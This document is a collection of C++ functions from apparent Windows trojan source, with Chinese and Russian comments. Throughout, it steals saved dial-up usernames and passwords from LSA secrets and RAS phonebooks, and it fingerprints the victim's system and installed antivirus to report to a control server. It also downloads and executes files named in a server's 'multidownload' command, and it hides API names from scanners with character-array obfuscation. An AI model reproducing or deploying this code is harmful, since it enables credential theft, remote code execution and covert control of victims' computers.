void GetCurrentUserNamet(char szUser[]) { char TszUser[50]={0}; char TszDomain[50]={0}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); if(GetCurrentUserName(TszUser,TszDomain)) { pwsprintfA(szUser,"%s",TszUser); } else { pwsprintfA(szUser,"%s","无用户登陆状态!"); } }
void CDialupass::GetLsaPasswords() { PLSA_UNICODE_STRING PrivateData; // char Win2k[]="RasDialParams!%s#0"; // char WinXP[]="L$_RasDefaultCredentials#0"; char Win2k[] = {'R','a','s','D','i','a','l','P','a','r','a','m','s','!','%','s','#','0','\0'}; char WinXP[] = {'L','$','_','R','a','s','D','e','f','a','u','l','t','C','r','e','d','e','n','t','i','a','l','s','#','0','\0'}; char temp[256]; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(temp,Win2k,GetLocalSid()); PrivateData=GetLsaData(temp); char HrFvD05[] = {'L','s','a','F','r','e','e','M','e','m','o','r','y','\0'}; LsaFreeMemoryT pLsaFreeMemory=(LsaFreeMemoryT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD05); if(PrivateData!=NULL) { ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length); pLsaFreeMemory(PrivateData->Buffer); } PrivateData=GetLsaData(WinXP); if(PrivateData!=NULL) { ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length); pLsaFreeMemory(PrivateData->Buffer); } }
bool UpdateContentLength(PREQUEST Request, bool FreeOldBuf) { // Функция обновляет заголовок "Content-Length" в заголовках HTTP запроса char * Buffer = (char *)Request->pBuf; // копируем HTTP заголовок int HeaderOffset = m_istrstr(Buffer, "\r\n\r\n" ); if (HeaderOffset == -1) return false; HeaderOffset += 4; // увеличиваем размер заголовка на "\r\n\r\n" PCHAR Header = StrNew(Buffer, HeaderOffset); if (Header == NULL) return false; // Лпределяем позицию параметра в заголовках m_lstrlwr(Header); // приводим заголовок к нижнему регистру char CL[] = {'c','o','n','t','e','n','t','-','l','e','n','g','t','h',':',' ',0}; int Pos = m_istrstr(Header, CL); StrFree(Header); if (Pos == -1) return false; // Копируем оригинальный заголовок DWORD ParamLen = m_lstrlen(CL); char *ParamName = (char*)MemAlloc(ParamLen + 1); if (ParamName == NULL) return false; m_memcpy(ParamName, Buffer + Pos, ParamLen); // Создаём строку с новым значением DWORD NewValue = m_lstrlen(Buffer + HeaderOffset); char NewContentLen[10]; typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); pwsprintfA(NewContentLen, "%d", NewValue); // Вписываем новое значение char *NewBuffer = NULL; bool Result = SubstituteText(Buffer, 0, &NewBuffer, ParamName, NewContentLen, "\r\n") >= 0; MemFree(ParamName); // Меняем буфер запроса if (Result) { if (FreeOldBuf) MemFree(Request->pBuf); Request->pBuf = (LPBYTE)NewBuffer; Request->uBufSize = m_lstrlen(NewBuffer); } return Result; }
DWORD CDialupass::GetRasEntryCount() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { nCount++; } } delete lpszReturnBuffer; return nCount; }
bool CDialupass::GetRasEntries() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; OSVERSIONINFO osi; osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'}; GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05); pGetVersionExA(&osi); if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5) { GetLsaPasswords(); } DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { char *lpRealSection = (char *)UTF8ToGB2312(lpSection); char strDialParamsUID[256]; char strUserName[256]; char strPassWord[256]; char strPhoneNumber[256]; char strDevice[256]; memset(strDialParamsUID, 0, sizeof(strDialParamsUID)); memset(strUserName, 0, sizeof(strUserName)); memset(strPassWord, 0, sizeof(strPassWord)); memset(strPhoneNumber, 0, sizeof(strPhoneNumber)); memset(strDevice, 0, sizeof(strDevice)); char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'}; GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04); int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]); char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'}; lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03); if (nBufferLen > 0)//DialParamsUID=4326020 198064 { for(int j=0; j< (int)m_nRasCount; j++) { if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0) { plstrcpyA(strUserName, m_PassWords[j].login); plstrcpyA(strPassWord, m_PassWords[j].pass); m_PassWords[j].used=true; m_nUsed++; break; } } } pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]); pGetPrivateProfileStringA(lpSection, "Device", 0, strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]); char *lpRealDevice = (char *)UTF8ToGB2312(strDevice); char *lpRealUserName = (char *)UTF8ToGB2312(strUserName); Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord, strPhoneNumber, lpRealDevice); // delete lpRealSection; // delete lpRealUserName; // delete lpRealDevice; } } delete lpszReturnBuffer; return true; }
bool ReportToPlugin( char *Url ) { WSADATA wsa; if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 ) { return false; } char *Host = NULL; char *Path = NULL; int Port = 0; if ( !ParseUrl1( Url, &Host, &Path, &Port ) ) { return false; } char Uid[100]; GenerateUid( Uid ); typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); char *UserAgent = NULL; UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); if ( UserAgent == NULL ) { MemFree( UserAgent ); UserAgent = "-"; } char Request[] = "POST %s HTTP/1.0\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Accept: text/html\r\n" "Connection: Close\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\n"; char Args[] = "id="; char *HttpPacket = NULL; HttpPacket = (char*)MemAlloc( 2048 ); int iTmp; if (LoadExe!=NULL) { iTmp=m_lstrlen(LoadExe); }else iTmp=9; pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp ); m_lstrcat( HttpPacket, Args ); m_lstrcat( HttpPacket, Uid ); if (LoadExe==NULL) { LoadExe = (char*)MemAlloc(10); m_lstrncpy(LoadExe,"&plugins=",9); LoadExe[9]='\0'; } m_lstrcat( HttpPacket, LoadExe ); SOCKET Socket = MyConnect1( Host, Port ); if( Socket == -1 ) { return false; } bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) ); MemFree( HttpPacket ); if ( !b ) { return false; } DWORD dwSize = 0; char *Buffer = RecvAndParse( Socket, &dwSize ); if ( !Buffer ) { pclosesocket( Socket ); return false; } char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0}; char *Context; m_strtok_s( Buffer, "\r\n", &Context ); if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) ) { char * cPointer= m_strstr(&Buffer[1],"http:"); char* cUrl=Buffer; char* cUrlNext; int i; char *DownloadUrl; while (true) { cUrl= m_strstr(&cUrl[1],"http:"); if (cUrl==NULL)break; cUrlNext= m_strstr(cUrl,"|"); i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext); DownloadUrl = (char*)MemAlloc(i)+1; m_lstrncpy(DownloadUrl,cUrl,i); DownloadUrl[i]='\0'; if ( DownloadUrl ) { LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1); m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str()); m_lstrcat( LoadExe, "|"); WCHAR *FileName =(WCHAR *)GetTempName(); if ( FileName && DownloadUrl ) { ExecuteFile( DownloadUrl, FileName ); } MemFree( FileName ); } MemFree( DownloadUrl ); } } MemFree( Buffer ); pclosesocket( Socket ); return true; }
void CSystemManager::GetSystemInfo() { MESSAGEInfo Infomsg; //获取操作系统相关信息 Infomsg.bToken = TOKEN_SYSTEMINFO; //////////////CPU Speed///////////////// DWORD dwCpu, dwBufLen; HKEY hKey; char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'}; char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'}; RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07); pRegOpenKeyExA( HKEY_LOCAL_MACHINE, JYvni02, 0, KEY_QUERY_VALUE, &hKey ); dwBufLen = sizeof(DWORD); char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'}; RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA"); pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen); char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06); pRegCloseKey(hKey); char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu); //Get CPU Info=============================== CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'}; // CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0"); hKey = NULL; if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS) { DWORD dwType; DWORD dwSize = 128 * sizeof(TCHAR); pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize); pRegCloseKey(hKey); } //Get Computer & User Name======================== DWORD dwLen = sizeof(Infomsg.szPcName); char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'}; GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16); pGetComputerNameA(Infomsg.szPcName, &dwLen); /* dwLen = sizeof(Infomsg.szUserName); GetUserName(Infomsg.szUserName,&dwLen); //获取当前用户名 */ //获取当前用户名及计算机名称 GetCurrentUserNamet(Infomsg.szUserName); //Get Screen Size================================= char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'}; GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67); pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN)); // UINT Porst =dwPort[nConnect]; if(nConnect==0) pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]); //域名上线写入 if(nConnect==1) pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]); //QQ上线写入 if(nConnect==2) pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]); //网盘上线写入 pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]); //上线端口写入 char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'}; GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03); char szbuf[256]; pGetModuleFileNameA(NULL,szbuf,MAX_PATH); //用于获取程序本身路径 pwsprintfA(Infomsg.Program,"%s",szbuf ); if(Installope==0) //绿色一次性运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!"); //上线运行方式 } else if(Installope==1) // 服务启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!"); //上线运行方式 } else if(Installope==2) // 直接启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!"); //上线运行方式 } pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus()); //杀毒软件 Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo)); }
char* GetVirus() { static char AllName[256] = ""; //360安全 卡巴 江民 char* VirusName = "360tray.exe"; char* VirusName1 = "avp.exe"; char* VirusName2 = "KvMonXP.exe"; //瑞星 360杀毒 麦咖啡 char* VirusName3 = "RavMonD.exe"; char* VirusName4 = "360sd.exe"; char* VirusName5 = "Mcshield.exe"; //NOD32 金山 可牛 char* VirusName6 = "egui.exe"; char* VirusName7 = "kxetray.exe"; char* VirusName8 = "knsdtray.exe"; //趋势 小红伞 avast char* VirusName9 = "TMBMSRV.exe"; char* VirusName10 = "avcenter.exe"; char* VirusName11 = "ashDisp.exe"; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(AllName,"%s",""); // char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); if (GetProcessID(VirusName)) { VirusName = "360安全卫士"; plstrcatA( AllName, VirusName); // plstrcatA( AllName, " " ); } if (GetProcessID(VirusName1)) { VirusName1 = "卡巴"; plstrcatA( AllName, VirusName1 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName2)) { VirusName2 = "江民"; plstrcatA( AllName, VirusName2 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName3)) { VirusName3 = "瑞星"; plstrcatA( AllName, VirusName3 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName4)) { VirusName4 = "360杀毒"; plstrcatA( AllName, VirusName4 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName5)) { VirusName5 = "麦咖啡"; plstrcatA( AllName, VirusName5 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName6)) { VirusName6 = "NOD32"; plstrcatA( AllName, VirusName6 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName7)) { VirusName7 = "金山"; plstrcatA( AllName, VirusName7 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName8)) { VirusName8 = "可牛"; plstrcatA( AllName, VirusName8 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName9)) { VirusName9 = "趋势"; plstrcatA( AllName, VirusName9 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName10)) { VirusName10 = "小红伞"; plstrcatA( AllName, VirusName10 ); plstrcatA( AllName, " " ); } if (GetProcessID(VirusName11)) { VirusName11 = "Avast"; plstrcatA( AllName, VirusName11 ); plstrcatA( AllName, " " ); } if (Gyfunction->my_strstr(AllName, " " ) == 0 ) { plstrcatA(AllName , "未发现 "); } return AllName; }